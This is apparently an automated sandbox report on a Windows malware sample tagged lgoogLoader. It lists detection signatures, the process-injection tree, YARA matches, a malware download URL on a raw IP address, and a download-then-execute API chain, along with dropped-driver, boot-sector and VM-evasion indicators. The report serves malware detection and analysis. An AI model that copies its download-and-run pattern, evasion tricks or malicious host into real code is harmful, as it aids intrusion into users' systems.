Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:862324
MD5:851dfeb9035473532d796a9b41608b3c
SHA1:beca84bb1ffd0146f8e5b87a01b14b42e8d50e2b
SHA256:5867c5321292565fa017f4e88b6c4894572d7fa557e9a0ddb1ced4362413b6b3
Tags:exe
Infos:

Detection

lgoogLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected lgoogLoader
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Writes to foreign memory regions
Contains functionality to infect the boot sector
Sample is not signed and drops a device driver
Contain functionality to detect virtual machines
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large strings
Contains functionality to inject code into remote processes
Sample uses string decryption to hide its real strings
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
Enables driver privileges
Drops PE files
Creates driver files
Contains functionality to launch a program with higher privileges
Spawns drivers
PE / OLE file has an invalid certificate
Creates or modifies windows services
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • file.exe (PID: 6596 cmdline: C:\Users\user\Desktop\file.exe MD5: 851DFEB9035473532D796A9B41608B3C)
    • jsc.exe (PID: 2040 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe MD5: 2B40A449D6034F41771A460DADD53A60)
    • mscorsvw.exe (PID: 3092 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe MD5: B00E9325AC7356A3F4864EAAAD48E13F)
    • aspnet_compiler.exe (PID: 4768 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe MD5: 7809A19AA8DA1A41F36B60B0664C4E20)
    • RegSvcs.exe (PID: 7156 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe MD5: 59FCE79E9D81AB9E2ED4C3561205F5DF)
    • dfsvc.exe (PID: 4136 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe MD5: 48FD4DD682051712E3E7757C525DED71)
    • aspnet_regbrowsers.exe (PID: 2192 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe MD5: BF7E443F1E1FA88AD5A2A5EB44F42834)
    • AddInProcess32.exe (PID: 4740 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
LgoogLoaderLgoogLoader is an installer that drops three files: a batch file, an AutoIt interpreter, and an AutoIt script. After downloading, it executes the batch file.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lgoogloader
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth (Nextron Systems)
  • 0xade:$xo1: \x9E\xA2\xA3\xB9\xEA\xBA\xB8\xA5\xAD\xB8\xAB\xA7\xEA\xA9\xAB\xA4\xA4\xA5\xBE\xEA\xA8\xAF\xEA\xB8\xBF\xA4\xEA\xA3\xA4\xEA\x8E\x85\x99\xEA\xA7\xA5\xAE\xAF
  • 0x6546:$xo1: \x9E\xA2\xA3\xB9\xEA\xBA\xB8\xA5\xAD\xB8\xAB\xA7\xEA\xA9\xAB\xA4\xA4\xA5\xBE\xEA\xA8\xAF\xEA\xB8\xBF\xA4\xEA\xA3\xA4\xEA\x8E\x85\x99\xEA\xA7\xA5\xAE\xAF
00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_lGoogLoaderYara detected lgoogLoaderJoe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: file.exeReversingLabs: Detection: 13%
    Source: file.exeVirustotal: Detection: 20%Perma Link
    Source: http://109.206.241.33/files/1un.config.CfgEncFileAvira URL Cloud: Label: malware
    Source: http://109.206.241.33/files/1un.config.CfgEncFileMZAvira URL Cloud: Label: malware
    Source: http://109.206.241.33/files/1un.config.CfgEncFileVirustotal: Detection: 16%Perma Link
    Source: 7.2.AddInProcess32.exe.400000.0.raw.unpackString decryptor: e_lh_fMLH^ff
    Source: 7.2.AddInProcess32.exe.400000.0.unpackAvira: Label: TR/Patched.Gen
    Source: 7.2.AddInProcess32.exe.2b50000.4.unpackAvira: Label: TR/Crypt.XPACK.Gen3
    Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: c:\src\ShellRunas\Release\ShellRunas.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp
    Source: Binary string: <c:\src\ShellRunas\Release\ShellRunas.pdb source: AddInProcess32.exe, 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp
    Source: Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: ?????.sys.0.dr
    Source: Binary string: C:\Users\Konka\source\repos\WinFormGregorCatch\obj\x86\Debug\WinFormGregorCatch.pdb source: file.exe
    Source: AddInProcess32.exeString found in binary or memory: http://109.206.241.33/files/1un.config.CfgEncFile
    Source: AddInProcess32.exe, 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000007.00000002.392608147.0000000002B40000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://109.206.241.33/files/1un.config.CfgEncFileMZ
    Source: file.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
    Source: file.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
    Source: file.exeString found in binary or memory: http://ocsp.sectigo.com0
    Source: AddInProcess32.exeString found in binary or memory: http://www.sysinternals.com
    Source: AddInProcess32.exe, 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmd
    Source: file.exeString found in binary or memory: https://sectigo.com/CPS0
    Source: ?????.sys.0.drString found in binary or memory: https://www.sysinternals.com0
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_02B51000 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,Sleep,PathFileExistsW,DeleteFileW,URLDownloadToFileW,PathFileExistsW,GetProcessHeap,HeapAlloc,StrCatW,StrCatW,StrCatW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,Sleep,7_2_02B51000

    System Summary

    barindex
    Source: file.exe, u9ff3???????????????/??????????????????.csLong String: Length: 636952
    Source: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth (Nextron Systems), description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_00404AF07_2_00404AF0
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_004084B77_2_004084B7
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_01381AA87_2_01381AA8
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_00402050 _memset,_memset,_memset,_memset,_memset,__wcsicmp,__wcsicmp,__wcsicmp,SetEnvironmentVariableW,_memset,_wcscpy_s,_wcscat_s,CreateProcessW,GetLastError,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,_wcscpy_s,_memset,_memset,_memset,CreateProcessWithLogonW,GetLastError,EnumWindows,Sleep,Sleep,EnumWindows,CloseHandle,CloseHandle,CloseHandle,LoadIconW,LoadIconW,LoadIconW,LoadCursorW,RegisterClassExW,CreateDialogParamW,GetMessageW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetMessageW,LocalFree,7_2_00402050
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_02B5355B: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,lstrcpyA,lstrcatA,lstrcatA,StrNCatA,CloseHandle,StrNCatA,7_2_02B5355B
    Source: file.exeStatic PE information: No import functions for PE file found
    Source: file.exe, 00000000.00000000.310047330.000001C5BAD38000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWinFormGregorCatch.exeF vs file.exe
    Source: file.exeBinary or memory string: OriginalFilenameWinFormGregorCatch.exeF vs file.exe
    Source: C:\Users\user\Desktop\file.exeProcess token adjusted: Load DriverJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\?????.sysJump to behavior
    Source: C:\Users\user\Desktop\file.exeDriver loaded: \Registry\Machine\System\CurrentControlSet\Services\TaskKillJump to behavior
    Source: file.exeStatic PE information: invalid certificate
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\?????.sys 440883CD9D6A76DB5E53517D0EC7FE13D5A50D2F6A7F91ECFC863BC3490E4F5C
    Source: file.exeReversingLabs: Detection: 13%
    Source: file.exeVirustotal: Detection: 20%
    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.logJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\?????.sysJump to behavior
    Source: ?????.sys.0.drBinary string: \DosDevices\PROCEXP152\ObjectTypes\\Device\PROCEXP152PsAcquireProcessExitSynchronizationPsReleaseProcessExitSynchronizationMmGetMaximumNonPagedPoolInBytesObGetObjectTypeMutantIoCreateDeviceSecureIoValidateDeviceIoControlAccessD:P
    Source: classification engineClassification label: mal100.troj.evad.winEXE@15/2@0/0
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_004029C0 _memset,_memset,SHGetMalloc,SHGetDesktopFolder,SearchPathW,GetLastError,CoInitialize,CoCreateInstance,#217,#173,CoUninitialize,7_2_004029C0
    Source: file.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
    Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
    Source: file.exe, u9ff3???????????????/??????????????????.csBase64 encoded string: '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
    Source: file.exe, u9ff3???????????????/??????????????????.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: file.exeStatic file information: File size 1338216 > 1048576
    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x144800
    Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: c:\src\ShellRunas\Release\ShellRunas.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp
    Source: Binary string: <c:\src\ShellRunas\Release\ShellRunas.pdb source: AddInProcess32.exe, 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp
    Source: Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: ?????.sys.0.dr
    Source: Binary string: C:\Users\Konka\source\repos\WinFormGregorCatch\obj\x86\Debug\WinFormGregorCatch.pdb source: file.exe

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: file.exe, u9ff3???????????????/??????????????????.cs.Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_00404ACD push ecx; ret 7_2_00404AE0
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_01382D32 push cs; retf 7_2_01382D36
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_0138155C push es; retf 7_2_01381571
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_013821DB push edx; ret 7_2_013821DC
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_01382DD4 push cs; retf 7_2_01382DEA
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_01382DC3 push cs; retf 7_2_01382DD1
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_01382036 push ss; retf 7_2_0138204B
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_01382E0D push cs; retf 7_2_01382E1B
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_01384A8A push esi; iretd 7_2_01384A8D
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 7_2_00402CB0 _memset,_memset,_wcscpy_s,_wcscat_s,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetLastError,LoadLibraryW,GetProcAddress,_wcschr,_wcscpy_s,GetComputerNameW,CredUIParseUserNameW,CoTaskMemFree,7_2_00402CB0

    Persistence and Installation Behavior

    barindex
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,lstrcpyA,lstrcatA,lstrcatA,StrNCatA,CloseHandle,StrNCatA, \\.\PhysicalDrive%d7_2_02B5355B
    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\?????.sysJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\?????.sysJump to dropped file

    Boot Survival

    barindex
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,lstrcpyA,lstrcatA,lstrcatA,StrNCatA,CloseHandle,StrNCatA, \\.\PhysicalDrive%d7_2_02B5355B
    Source: C:\Users\user\Desktop\file.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TaskKillJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: VMware VBox QEMU QEMU VMware VBox QEMU QEMU 7_2_02B5372C
    Source: C:\Users\user\Desktop\file.exe TID: 6576Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_7-7671
    Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\?????.sysJump to dropped file
    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeAPI coverage: 5.9 %
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeAPI call chain: ExitProcess graph end nodegraph_7-7672
    Source: AddInProcess32.exe, 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMware
